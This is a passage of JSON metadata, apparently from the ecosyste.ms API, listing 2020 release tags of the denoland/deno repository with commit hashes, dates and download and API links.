repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosys